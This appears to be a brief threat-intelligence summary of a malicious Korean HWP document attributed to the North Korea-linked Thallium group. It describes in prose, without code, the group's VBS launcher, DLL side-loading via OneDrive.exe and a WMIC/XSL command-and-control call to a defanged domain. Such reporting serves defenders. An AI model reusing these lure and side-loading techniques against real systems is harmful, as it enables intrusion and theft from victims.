ESTsecurity analyzed a Thallium-attributed malicious HWP document disguised as a COVID-19 small-business support guide. The document used embedded OLE objects and fake confirmation imagery to lure the user into launching apisecurity.vbs, which staged apisecurity.key as xmllite.dll under the OneDrive directory for DLL side-loading by OneDrive.exe. The payload attempted command-and-control communication through an FTP-formatted WMIC/XSL Script Processing command referencing b.smtper[.]co, and the article linked the tradecraft to earlier Thallium spear-phishing and supply-chain cases. The report highlights continued use of Korean-language document lures, HWP/OLE execution tricks, and stealthy OneDrive-based side-loading by this North Korea-linked cluster.